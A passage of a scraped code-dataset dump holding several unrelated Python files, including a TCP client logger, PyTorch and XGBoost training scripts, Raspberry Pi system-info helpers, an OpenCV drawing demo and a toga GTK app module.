current_datetime + \" - \" + data\n if connected == 0:\n f.write('**********************************************************************************************\\n')\n f.write('time: ' + str(current_datetime_connection) + ' - connection to host: ' + str(host) + ' port: ' + str(port))\n f.write('\\n\\n')\n connected = 1\n f.write('sent: ' + str(current_datetime_sent) + \" - \" + message)\n f.write('\\n')\n # print(str(current_datetime_responce) + \" - \" + data)\n f.write('response: ' + str(current_datetime_responce) + \" - \" + data[1:])\n f.write('\\n----------------------------------------------------------------\\n\\n')\n if (len(data) < 1024):\n break\n f.close()\n print ('Successfully recieved logs to the file')\n if choice >= 4:\n if wasInFour == 0:\n wasInFour = 1\n with open('log_client.txt','a') as f:\n current_datetime_disconnection = datetime.now()\n f.write('time: ' + str(current_datetime_disconnection) + ' - client has disconnected from host: ' + str(host) + ' port: ' + str(port))\n f.write('\\n*********************************************************************************************\\n\\n')\n f.close\n s.close()\n print ('connection closed')\n","sub_path":"TCPClient-python/client_MacOs.py","file_name":"client_MacOs.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"279547532","text":"import torch\nfrom model import Lambda_Unet\nfrom skimage import io, transform\nfrom dataset import FluoDataset\nfrom torchvision import transforms, utils\nfrom torch.utils.data import DataLoader\n#from torch.utils.tensorboard import SummaryWriter\nfrom torch import optim\nimport torch.nn as nn\n\ndef train(net,dataset,epochs=10,batch_size=10,lr=0.99,device=\"cpu\"):\n train_loader = DataLoader(dataset, batch_size=batch_size, shuffle=True, num_workers=8, pin_memory=True)\n optimizer = optim.RMSprop(net.parameters(), lr=lr, weight_decay=1e-8, momentum=0.9)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min' if net.n_classes > 1 else 'max', patience=2)\n\n if net.n_classes > 1:\n criterion = nn.CrossEntropyLoss()\n else:\n criterion = nn.BCEWithLogitsLoss()\n\n for epochs in range(epochs):\n net.train()\n epoch_loss = 0\n for batch in train_loader:\n x = batch[\"image\"].to(device=device)\n y = batch[\"ground_truth\"].to(device=device)\n \n pred = net(x)\n loss = criterion(pred,y)\n epoch_loss += loss.item()\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n\n\n\nif __name__ == '__main__':\n data_transform = transforms.Compose([\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomAffine((0, 360)),\n transforms.Resize(512),\n transforms.ToTensor(),\n\n ])\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n tr_dataset = FluoDataset(\"/home/mhun/data/Fluo-N2DH-GOWT1/01/\", \"/home/mhun/data/Fluo-N2DH-GOWT1/01_GT/TRA/\",\n transform=data_transform, target_transform=data_transform)\n\n net = Lambda_Unet(n_classes=1)\n\n net.to(device=device)\n\n train(net,tr_dataset,epochs=10,batch_size=1,lr=0.99,device=device)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"210972013","text":"#!/usr/bin/python3\n\nimport time\nimport socket \nimport fcntl \nimport struct \nimport sys\nimport subprocess\nimport os\nimport urllib, re\n\ndef get_ram():\n s = subprocess.check_output([\"free\",\"-m\"])\n lines = s.split('\\n') \n return ( int(lines[1].split()[1]), int(lines[2].split()[3]) ) \n\ndef get_up_stats():\n s = subprocess.check_output([\"uptime\"])\n load_split = s.split('load average: ')\n load_five = float(load_split[1].split(',')[1])\n up = load_split[0]\n up_pos = up.rfind(',',0,len(up)-4)\n up = up[:up_pos].split('up ')[1]\n return ( up , load_five ) \n\ndef get_connections():\n s = subprocess.check_output([\"netstat\",\"-tun\"])\n return len([x for x in s.split() if x == 'ESTABLISHED'])\n\ndef get_temphumid():\n \n dht_sensor_location = '/home/webide/repositories/my-pi-projects/RPi-ST7565-Menu/Adafruit_DHT'\n args = \"2302 25\" #format: sensor type (11, 22, 2302), GPIO pin\n sensor_output = subprocess.Popen(dht_sensor_location + ' ' + args, shell=True, stdout=subprocess.PIPE)\n temphumid = sensor_output.communicate()[0]\n temphumid = temphumid.rstrip('\\n')\n if temphumid == '':\n pass\n return temphumid\n\ndef get_ipaddress():\n arg='ip route list'\n p=subprocess.Popen(arg,shell=True,stdout=subprocess.PIPE)\n data = p.communicate()\n split_data = data[0].split()\n ipaddr = split_data[split_data.index('src')+1]\n return ipaddr\n\ndef get_cpu_speed():\n f = os.popen('/opt/vc/bin/vcgencmd get_config arm_freq')\n cpu = f.read()\n return cpu\n","sub_path":"Info.py","file_name":"Info.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"128485543","text":"\n\nfrom xai.brain.wordbase.nouns._foam import _FOAM\n\n#calss header\nclass _FOAMS(_FOAM, ):\n\tdef __init__(self,): \n\t\t_FOAM.__init__(self)\n\t\tself.name = \"FOAMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"foam\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_foams.py","file_name":"_foams.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"411121989","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 31 19:32:52 2016\n\n@author: p000495138\n\"\"\"\n\nfrom control.matlab import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef main():\n\n (k1, T1) = (1, 1) # 一次遅れ要素のパラメータ1\n (k2, T2) = (2, 10) # 一次遅れ要素のパラメータ2\n G1= tf([k1],[T1,1]) # 伝達関数表現\n G2= tf([k2],[T2,1]) # 伝達関数表現\n w = np.logspace(-2,2,100) # 角周波数(10^-2~10^2)\n bode(G1,G2,w) # ボード線図の計算とプロット\n plt.legend([\"T=1, k=1\"],[\"T=10, k=2\"],3) # 凡例\n plt.show() # 結果表示\n\n\nif __name__ == '__main__':\n main()","sub_path":"04_playground/07_contorl/d01_ボード線図/python_bode.py","file_name":"python_bode.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"90999954","text":"\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport cv2 as cv\nimport matplotlib.pyplot as plt\nfrom scipy.ndimage.interpolation import shift\nfrom xgboost import XGBClassifier\nimport pprint\npp = pprint.PrettyPrinter(indent=4)\n\n\n\nfrom tqdm import tqdm\n\n\nfrom tensorflow.keras.datasets import fashion_mnist\n\n\n#### Helper Functions ####\n\ndef shift_pixels(src, x, y):\n \"\"\"\n shift x pixels vertically and y pixels horizontally\n \"\"\"\n output = shift(src, [x,y], cval=0)\n \n return output\n\n\n\n\n\ndef plot_images(images, labels=None, correct_labels=None):\n '''Plot images with their labels. Ten each row'''\n plt.figure(figsize=(20,20))\n columns = 10\n for i, image in enumerate(images):\n ax = plt.subplot(len(images) / columns + 1, columns, i + 1)\n if (not labels is None) and (not correct_labels is None):\n ax.set_title(f\"Wr: {labels[i]} Ri: {correct_labels[i]}\", fontsize=14)\n elif not labels is None:\n ax.set_title(f\"{labels[i]}\", fontsize=16)\n \n plt.axis('off')\n plt.subplots_adjust(bottom=0.1)\n plt.imshow(image, cmap='gray')\n\n\ndef get_samples(n_samples, X, y=None):\n '''Get n_samples randomly'''\n samples_index = np.random.choice(np.arange(len(X)), n_samples, replace=False)\n if not y is None:\n return X[samples_index], y[samples_index]\n return X[samples_index]\n\n\n\n\n\n\n\n\n# #### Pre-process data:\n# - Scale pixel values\n# - Augment the data: shift the images, denoise the images\n# - Flatten the 2D array --> 1D vector\n# \n\n# \n\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\nclass DenoiseTransformer(BaseEstimator, TransformerMixin):\n\tdef __init__(self):\n\t\tpass\n\n\tdef fit(self, X, y=None):\n\t\treturn self\n \t\n\tdef denoise(self, src_img, threshold=50, display=False):\n \n\t\tnew_image = np.minimum(src_img, 255)\n\t\tnew_image[new_image < threshold] = 0\n\t\tif display:\n\t\t\tplt.figure(figsize=(15,15))\n\t\t\tplt.subplot(121),plt.imshow(src_img , cmap='gray')\n\t\t\tplt.subplot(122),plt.imshow(new_image , cmap='gray')\n\t\treturn new_image \n\n\n\tdef transform(self, X, y=None):\n\t\t#return np.array([skimage.color.rgb2gray(img) for img in X])\n\t\treturn np.array([self.denoise(img) for img in X])\n\n\n\nclass ShiftTransformer(BaseEstimator, TransformerMixin):\n\tdef __init__(self, y):\n\t\tself.y = y\n\t\tself.n = y.shape[0]\n\t\tpass\n \n\tdef fit(self, X, y=None):\n\t\treturn self\n\n\tdef image_generator(self, src_image, src_label):\n\t\t# create placeholder\n\t\toutput_image = np.zeros((9, *src_image.shape))\n\n\t\toutput_image[0] = shift_pixels(src_image, 1, 0)\n\t\toutput_image[1] = shift_pixels(src_image, -1, 0)\n\t\toutput_image[2] = shift_pixels(src_image, 2, 0)\n\t\toutput_image[3] = shift_pixels(src_image, -2, 0)\n\t\toutput_image[4] = shift_pixels(src_image, 0, 1)\n\t\toutput_image[5] = shift_pixels(src_image, 0, -1)\n\t\toutput_image[6] = shift_pixels(src_image, 0, 2)\n\t\toutput_image[7] = shift_pixels(src_image, 0, -2)\n\t\toutput_image[8] = shift_pixels(src_image, 0, 0)\n\t\toutput_label = np.array([src_label for i in range(9)])\n\n\t\treturn output_image, output_label\n \n\tdef transform(self, X, y=None):\n\t\t#print(y)\n\t\tX_out = np.zeros((self.n * 9, 28, 28))\n\t\ty_out = np.zeros((self.n * 9, ))\n\t\tfor i in tqdm(range(X.shape[0])):\n\t\t\tX_out[i*9: i*9+9], y_out[i*9:i*9+9] = self.image_generator(X[i], self.y[i])\n\t\t\t\n\t\treturn X_out, y_out\n\n\n\n(X_train, y_train), (X_test, y_test) = fashion_mnist.load_data()\n\n\nprint('Training data:', X_train.shape, y_train.shape)\nprint('Test data:', X_test.shape, y_test.shape)\n\n\ndenoise_train = DenoiseTransformer()\nshift_train = ShiftTransformer(y_train)\n\ndenoise_test = DenoiseTransformer()\nshift_test = ShiftTransformer(y_test)\n\ndenoised_X_train = denoise_train.fit_transform(X_train)\nnew_X_train, new_y_train = shift_train.fit_transform(denoised_X_train) \n\ndenoised_X_test = denoise_test.fit_transform(X_test)\nnew_X_test, new_y_test = shift_test.fit_transform(denoised_X_test)\n\nprint('New training data: ', new_X_train.shape)\nprint('New training label:', new_y_train.shape)\n\nprint('New test data: ', new_X_test.shape)\nprint('New test label:', new_y_test.shape)\n\n# Normalization\nX_train_flat = new_X_train.reshape((-1, 784)) / 255\nX_test_flat = new_X_test.reshape((-1, 784))/255\n\nprint('Training data after normalize:', X_train_flat.shape)\nprint('Test data after normalize:', X_test_flat.shape)\n\n\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.metrics import confusion_matrix, accuracy_score, make_scorer\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\n\n\n\n\n\n\nprint('XGBoost Training....')\n\nmodel_xgboost = XGBClassifier(tree_method='gpu_hist', predictor='gpu_predictor', max_depth=12)\nmodel_xgboost.fit( X_train_flat, new_y_train)\n\ny_train_pred = model_xgboost.predict(X_train_flat)\ny_test_pred = model_xgboost.predict(X_test_flat)\nprint('SVC Train accuracy: ', accuracy_score(new_y_train, y_train_pred))\nprint(\"SVC Test accuracy:\", accuracy_score(new_y_test, y_test_pred))\n\n\nimport pickle\n\npickle.dump(model_SVC, open('xgboost.pkl', 'wb'))\n\nexit(0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# In[ ]:\n\n\n#PATH = '/content/gdrive/MyDrive/FTMLE | 2020.11 | Izu/Week_6/Weekly_Project/'\nPATH = './'\n\n\n# In[ ]:\n\n\nX_test_augmented = np.load(PATH + 'FMNIST_augmented_test.npy')\n\n\n# In[ ]:\n\n\nX_test_augmented.shape\n\n\n# In[ ]:\n\n\nnp.min(X_train[3]), np.max(X_train[3]), np.mean(X_train[3]), np.std(X_train[3])\n\n\n# In[ ]:\n\n\nnp.min(X_test_augmented[5]), np.max(X_test_augmented[5]), np.mean(X_test_augmented[5]), np.std(X_test_augmented[5])\n\n\n# In[ ]:\n\n\nplt.figure(figsize=(28,28))\ntest_image = X_test_augmented[50]\nnew_image = np.minimum(test_image, 255)\nnew_image[new_image < 50] = 0\nplt.subplot(121),plt.imshow(test_image , cmap='gray')\nplt.subplot(122),plt.imshow(new_image , cmap='gray')\nplt.show()\n\n\n# In[ ]:\n\n\nimages = get_samples(40, X_test_augmented)\nplot_images(images)\n\n\n# Note: pay close attention to this test set. This test set is slightly different from the train set. In order to improve your model, make sure you know what the difference is so that you can perform appropriate processings.\n# \n# ** From my observation, the images in the test set are not centered and kind of shifting around a few pixels **\n\n# # Submit your predictions as csv file\n\n# In[ ]:\n\n\n# let's make a silly prediction that every image is T-shirt, meaning every prediction is 0\n# Here is how you can make such prediction\npredictions = np.zeros(shape=[len(X_test_augmented),]).astype(int)\n\n\n# In[ ]:\n\n\npredictions.shape # make sure that you have 40000 predictions, since the hidden test set has 40000 images\n\n\n# In[ ]:\n\n\npred_df = pd.DataFrame(predictions,columns=['pred'])\npred_df.head()\n\n\n# In[ ]:\n\n\n#MY_NAME='quantran'\n#\npred_df.to_csv(PATH + f\"/submissions/{MY_NAME}_submission.csv\", index=None)\n\n\n# By running the cell above, you actually submit your predictions directly to the submissions folder in Weekly_Project folder, as I have granted you permission to save files there. Let me know if you have any problem running the cell above.\n# \n# \n# \n# Good luck!\n\n# In[ ]:\n\n\nimport cv2 as cv\n\n\n# In[ ]:\n\n\nfrom matplotlib import pyplot as plt\n\n\n# In[ ]:\n\n\nimg = cv.imread('test1.jpg')\nprint(type(img))\ndst = cv.fastNlMeansDenoisingColored(img,None,10,10,7,21)\nplt.subplot(121),plt.imshow(img)\nplt.subplot(122),plt.imshow(dst)\nplt.show()\n\n\n# In[ ]:\n\n\nimg.shape\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"script_xgboost.py","file_name":"script_xgboost.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"474171864","text":"import os\nimport glob\nimport logging\n\nimport torch\nimport numpy as np\n\nfrom .utils import nested_getattr, nested_setattr\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseAlgo(object):\n \"\"\"\n Common methods for model checkpointing in pytorch.\n\n Attributes\n ----------\n checkpoint_directory : str\n The directory where checkpoints are stored. If not set, the checkpoint\n directory will be taken from ``self.data_logger.logdir``.\n data_logger : object\n num_steps : int\n Total number of training steps. It's assumed that subclasses will\n increment this in their training loops.\n checkpoint_interval : int\n Interval between subsequent checkpoints\n num_checkpoints : int\n Total number of checkpoints to maintain the logging directory.\n Older checkpoints that exceed this number are deleted.\n checkpoint_attribs : list\n List of attributes on the algorithm that ought to be saved at each\n checkpoint. This should be overridden by subclasses.\n Note that this implicitly contains ``num_steps``.\n \"\"\"\n checkpoint_directory = None\n data_logger = None\n\n num_steps = 0\n\n checkpoint_interval = 100000\n max_checkpoints = 3\n checkpoint_attribs = []\n\n _last_checkpoint = -1\n _checkpoint_directory = None\n\n @property\n def checkpoint_directory(self):\n return self._checkpoint_directory or (\n self.data_logger and self.data_logger.logdir)\n\n @checkpoint_directory.setter\n def checkpoint_directory(self, value):\n self,_checkpoint_directory = value\n\n def get_all_checkpoints(self):\n \"\"\"\n Return a sorted list of all checkpoints in the log directory.\n \"\"\"\n chkpt_dir = self.checkpoint_directory\n if not chkpt_dir:\n return []\n files = glob.glob(os.path.join(chkpt_dir, 'checkpoint-*.data'))\n\n def step_from_checkpoint(f):\n try:\n return int(os.path.basename(f)[11:-5])\n except ValueError:\n return -1\n\n files = [f for f in files if step_from_checkpoint(f) >= 0]\n return sorted(files, key=step_from_checkpoint)\n\n def save_checkpoint_if_needed(self):\n if self._last_checkpoint < 0:\n self.save_checkpoint()\n elif self._last_checkpoint + self.checkpoint_interval < self.num_steps:\n self.save_checkpoint()\n else:\n pass # already have a recent checkpoint\n\n def save_checkpoint(self):\n chkpt_dir = self.checkpoint_directory\n if not chkpt_dir:\n return\n\n data = {'num_steps': self.num_steps}\n for attrib in self.checkpoint_attribs:\n try:\n val = nested_getattr(self, attrib)\n except AttributeError:\n logger.error(\"Cannot save attribute '%s'\", attrib)\n continue\n if hasattr(val, 'state_dict'):\n val = val.state_dict()\n data[attrib] = val\n\n path = os.path.join(chkpt_dir, 'checkpoint-%i.data' % self.num_steps)\n torch.save(data, path)\n logger.info(\"Saving checkpoint: '%s'\", path)\n\n old_checkpoints = self.get_all_checkpoints()\n for old_checkpoint in old_checkpoints[:-self.max_checkpoints]:\n os.remove(old_checkpoint)\n\n self._last_checkpoint = self.num_steps\n\n def load_checkpoint(self, checkpoint_name=None):\n chkpt_dir = self.checkpoint_directory\n if checkpoint_name and os.path.dirname(checkpoint_name):\n # Path includes a directory.\n # Treat it as a complete path name and ignore chkpt_dir\n path = checkpoint_name\n elif chkpt_dir and checkpoint_name:\n path = os.path.join(chkpt_dir, checkpoint_name)\n else:\n checkpoints = self.get_all_checkpoints()\n path = checkpoints and checkpoints[-1]\n if not path or not os.path.exists(path):\n return\n\n if torch.cuda.is_available():\n checkpoint = torch.load(path)\n else:\n checkpoint = torch.load(path, map_location=torch.device('cpu'))\n\n for key, val in checkpoint.items():\n orig_val = nested_getattr(self, key, None)\n if hasattr(orig_val, 'load_state_dict'):\n orig_val.load_state_dict(val)\n else:\n try:\n nested_setattr(self, key, val)\n except AttributeError:\n logger.error(\"Cannot load key '%s'\", key)\n\n self._last_checkpoint = self.num_steps\n\n def tensor(self, data, dtype):\n \"\"\"\n Shorthand for creating a tensor with the current compute device.\n\n Note that this is *much* faster than passing data in list form to\n ``torch.tensor`` directly, at least as of torch v1.3.\n See https://github.com/pytorch/pytorch/issues/13918 for more details.\n \"\"\"\n data = np.asanyarray(data)\n return torch.as_tensor(data, device=self.compute_device, dtype=dtype)\n\n def take_one_step(self, envs):\n \"\"\"\n Take one step in each of the environments.\n\n Returns\n -------\n states : list\n actions : list\n rewards : list\n done : list\n Whether or not each environment reached its end this step.\n \"\"\"\n raise NotImplementedError\n\n def run_episodes(self, envs, num_episodes=None):\n \"\"\"\n Run each environment to completion.\n\n Note that no data is logged in this method. It's instead assumed\n that each environment has a wrapper which takes care of the logging.\n\n Parameters\n ----------\n envs : list\n List of environments to run in parallel.\n num_episodes : int\n Total number of episodes to run. Defaults to the same as number\n of environments.\n \"\"\"\n if num_episodes is None:\n num_episodes = len(envs)\n num_completed = 0\n\n while num_completed < num_episodes:\n data = self.take_one_step(envs)\n num_in_progress = len(envs)\n new_envs = []\n for env, done in zip(envs, data.done):\n if done:\n num_completed += 1\n if done and num_in_progress + num_completed > num_episodes:\n num_in_progress -= 1\n else:\n new_envs.append(env)\n envs = new_envs\n","sub_path":"training/base_algo.py","file_name":"base_algo.py","file_ext":"py","file_size_in_byte":6466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"583172016","text":"#from cv2 import cv2 as cv\nimport cv2 as cv\nimport numpy as np\n\nimg = np.zeros((512,512,3),np.uint8)\nprint(img)\nimg[:]= 255,0,0 # Try 0,255,0\nprint(img.shape)\n\ncv.line(img,(0,100),(img.shape[1],img.shape[0]),(0,255,0),3) # 첫번째는 좌표, 쉐입은 모르겠고, 세번째는 칼라, 네번째는 두께\ncv.rectangle(img,(0,0),(250,350),(0,0,255),2)\ncv.imshow(\"Image\",img)\n\ncv.circle(img,(380,180),30,(255,255,0),3) #첫번째는 좌표, 두번째는 반지름, 세번째괄호는 칼라, 마지막 숫자는 선두께\n\nx,y,w,h = 310,320,150,160\ncv.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)\ncv.putText(img,\" OPENCV \",(300,270),cv.FONT_HERSHEY_COMPLEX,1,(0,150,0),3)\ncv.imshow(\"Image\",img)\n\ncv.waitKey(0)\ncv.destroyAllWindows()","sub_path":"datas/DrawLines_RectanglesCircles_Text.py","file_name":"DrawLines_RectanglesCircles_Text.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"263106582","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(4) )\n\nprocess.source = cms.Source(\"PoolSource\",\n # replace 'myfile.root' with the source file you want to use\n fileNames = cms.untracked.vstring(\n 'file:/afs/cern.ch/user/m/melu/work/GEN_validation/CMSSW_9_4_9/src/temp/nomadspin_NLO.root'\n )\n)\n\nprocess.demo = cms.EDAnalyzer('Demo',\n\t\t# lhe = cms.InputTag(\"externalLHEProducer\"),\n\t\t# lhe1 = cms.VInputTag(cms.InputTag(\"externalLHEProducer\"), cms.InputTag(\"source\")),\n)\n\n\nprocess.p = cms.Path(process.demo)\n","sub_path":"GEN_validation/LHE_study/ConfFile_cfg.py","file_name":"ConfFile_cfg.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"12249150","text":"#!D:\\Environment\\Python3\\python\n\nage = int(input('请输入你家狗狗的年龄: '))\n\ntry:\n\tif age < 0 :\n\t print('你在逗我吧!')\n\telif age == 1:\n\t print('相当于 14 岁的人')\n\telif age == 2:\n\t print('相当于 22 岁的人')\n\telif age > 2 :\n\t human = 22 + ( age-2 ) * 5\n\t print('对应人类年龄:', human)\nexcept ValueError:\n\tprint('你输入的有问题')\n\n\ninput('点击 enter 退出')\n","sub_path":"Python/python.class/input.dog.py","file_name":"input.dog.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"140120764","text":"import asyncio\nimport os\nimport signal\nimport sys\n\ntry:\n import gi\nexcept ImportError:\n # app.py is the first module that will be imported when you import toga_gtk.\n #\n # If Gtk can't be imported, it may be because we're in a virtualenv,\n # and the system python libraries aren't visible. This can be fixed by\n # creating a symlink into the site-packages\n # Try creating a symlink to the system library location.\n # base_packages_dir is where the packages installed by the package manager\n # can be found.\n # gi_system_install_path is where gi can be found in the packages dir.\n # installer_command is the command the user can run to install gi.\n py_version = \"%d.%d\" % (sys.version_info.major, sys.version_info.minor)\n\n if sys.version_info.major == 3:\n if os.path.isdir('/usr/lib64/python%s/site-packages/' % (py_version,)):\n # Fedora\n base_packages_dir = '/usr/lib64/python%s/site-packages/' % (py_version,)\n gi_system_install_path = '/usr/lib64/python%s/site-packages/gi' % (py_version,)\n installer_command = 'dnf install pygobject3 python3-gobject'\n elif os.path.isdir('/usr/lib/python3/dist-packages/'):\n # Ubuntu, Debian\n base_packages_dir = '/usr/lib/python3/dist-packages/'\n gi_system_install_path = '/usr/local/lib/python3/dist-packages/gi'\n installer_command = 'apt-get install python3-gi'\n elif os.path.isdir('/usr/lib/python%s/site-packages/' % (py_version,)):\n # Arch\n base_packages_dir = '/usr/lib/python%s/site-packages/' % (py_version,)\n gi_system_install_path = '/usr/lib/python%s/site-packages/gi' % (py_version,)\n installer_command = 'pacman -S python-gobject'\n else:\n raise RuntimeError(\"Unable to locate your Python packages dir.\")\n else:\n raise RuntimeError(\"Toga requires Python 3.\")\n\n # Use the location of this package to guide us to\n # the location of the virtualenv.\n gi_symlink_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'gi')\n pygtkcompat_symlink_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'pygtkcompat')\n cairo_symlink_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'cairo')\n\n if gi_symlink_path == gi_system_install_path:\n # If we're not in a virtualenv, just raise the original import error.\n raise\n else:\n gi_path = os.path.join(base_packages_dir, 'gi')\n pygtkcompat_path = os.path.join(base_packages_dir, 'pygtkcompat')\n cairo_path = os.path.join(base_packages_dir, 'cairo')\n if os.path.exists(gi_path) and os.path.isdir(gi_path):\n\n # If we can identify the gi library, create a symlink to it.\n try:\n print(\"Creating symlink (%s & %s) to system GTK+ libraries...\" % (gi_symlink_path, pygtkcompat_symlink_path))\n os.symlink(gi_path, gi_symlink_path)\n os.symlink(pygtkcompat_path, pygtkcompat_symlink_path)\n\n try:\n print(\"Creating symlink (%s) to system Cairo libraries...\" % cairo_symlink_path)\n os.symlink(cairo_path, cairo_symlink_path)\n except OSError:\n # If we can't create the symlink, we'll get an error importing cairo;\n # report the error at time of use, rather than now.\n pass\n\n # The call to os.symlink will return almost immediately,\n # but for some reason, it may not be fully flushed to\n # the file system. One way to fix this is to start\n # the process again. This call to os.execl restarts the\n # program with the same arguments, replacing the original\n # operating system process.\n os.execl(sys.executable, sys.executable, *sys.argv)\n except OSError:\n raise RuntimeError(\"Unable to automatically create symlink to system Python GTK+ bindings.\")\n else:\n raise RuntimeError(\"Unable to locate the Python GTK+ bindings. Have you run '%s'?\" % installer_command)\n\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gio, GLib\n\n\nfrom toga.command import GROUP_BREAK, SECTION_BREAK, Command\nimport toga\nfrom .window import Window\nfrom toga import Icon\nfrom toga.handlers import wrapped_handler\n\nimport gbulb\n\n\nclass MainWindow(Window):\n _IMPL_CLASS = Gtk.ApplicationWindow\n\n def on_close(self, widget, data):\n pass\n\n\nclass App:\n \"\"\"\n Todo:\n * Creation of Menus is not working.\n * Disabling of menu items is not working.\n * App Icon is not showing up\n \"\"\"\n def __init__(self, interface):\n self.interface = interface\n self.interface._impl = self\n\n gbulb.install(gtk=True)\n self.loop = asyncio.get_event_loop()\n\n self.create()\n\n def create(self):\n Icon.app_icon = Icon.load(self.interface.icon, default=Icon.TIBERIUS_ICON)\n # Stimulate the build of the app\n self.native = Gtk.Application(application_id=self.interface.app_id, flags=Gio.ApplicationFlags.FLAGS_NONE)\n\n # Connect the GTK signal that will cause app startup to occur\n self.native.connect('startup', self.startup)\n self.native.connect('activate', self.activate)\n # self.native.connect('shutdown', self.shutdown)\n\n self.actions = None\n\n def startup(self, data=None):\n self.interface.commands.add(\n Command(None, 'About ' + self.interface.name, group=toga.Group.APP),\n Command(None, 'Preferences', group=toga.Group.APP),\n # Quit should always be the last item, in a section on it's own\n Command(lambda s: self.exit(), 'Quit ' + self.interface.name, shortcut='q', group=toga.Group.APP, section=sys.maxsize),\n Command(None, 'Visit homepage', group=toga.Group.HELP)\n )\n\n self.interface.startup()\n\n # Create the lookup table of menu items,\n # then force the creation of the menus.\n self._actions = {}\n self.create_menus()\n # self.interface.main_window._impl.create_toolbar()\n\n def activate(self, data=None):\n pass\n\n def open_document(self, fileURL):\n '''Add a new document to this app.'''\n print(\"STUB: If you want to handle opening documents, implement App.open_document(fileURL)\")\n\n def create_menus(self):\n # Only create the menu if the menu item index has been created.\n if hasattr(self, '_actions'):\n self._actions = {}\n menubar = Gio.Menu()\n label = None\n submenu = None\n section = None\n for cmd in self.interface.commands:\n if cmd == GROUP_BREAK:\n if section:\n submenu.append_section(None, section)\n\n if label == '*':\n self.native.set_app_menu(submenu)\n else:\n menubar.append_submenu(label, submenu)\n\n label = None\n submenu = None\n section = None\n elif cmd == SECTION_BREAK:\n submenu.append_section(None, section)\n section = None\n\n else:\n if submenu is None:\n label = cmd.group.label\n submenu = Gio.Menu()\n\n if section is None:\n section = Gio.Menu()\n\n try:\n action = self._actions[cmd]\n except KeyError:\n cmd_id = \"command-%s\" % id(cmd)\n action = Gio.SimpleAction.new(cmd_id, None)\n if cmd.action:\n action.connect(\"activate\", wrapped_handler(cmd, cmd.action))\n cmd._widgets.append(action)\n self._actions[cmd] = action\n self.native.add_action(action)\n\n # cmd.bind(self.interface.factory).set_enabled(cmd.enabled)\n\n item = Gio.MenuItem.new(cmd.label, 'app.' + cmd_id)\n if cmd.shortcut:\n item.set_attribute_value('accel', GLib.Variant('s', '%s' % cmd.shortcut.upper()))\n\n # item.set_attribute_value('accel', GLib.Variant(cmd.shortcut, '%s' % cmd.shortcut.upper()))\n\n section.append_item(item)\n\n if section:\n submenu.append_section(None, section)\n\n if submenu:\n if label == '*':\n self.native.set_app_menu(submenu)\n else:\n menubar.append_submenu(label, submenu)\n\n # Set the menu for the app.\n self.native.set_menubar(menubar)\n\n def main_loop(self):\n # Modify signal handlers to make sure Ctrl-C is caught and handled.\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n\n self.loop.run_forever(application=self.native)\n\n def exit(self):\n self.native.quit()\n","sub_path":"src/gtk/toga_gtk/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"346208570","text":"import random\n\ndef is_out_of_bounds(map_dim, pos_x, pos_y):\n return pos_x < 0 or pos_y < 0 or pos_x >= map_dim or pos_y >= map_dim\n\ndef is_cell_occupied(occupied_map, pos_x, pos_y):\n bounds_map = len(occupied_map)\n if is_out_of_bounds(bounds_map, pos_x, pos_y):\n return True\n elif occupied_map[pos_y][pos_x] <= 0:\n return False\n else:\n return True\n\ndef cells_around():\n dirs = [(-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)]\n random.shuffle(dirs, random.random)\n return dirs\n\ndef get_relative_karbonite_mine_positions(robot):\n pos_x = robot.me.x\n pos_y = robot.me.y\n karb_map = robot.get_karbonite_map()\n\n map_length = len(karb_map)\n queue = []\n distance = []\n\n for iter_i in range(map_length):\n for iter_j in 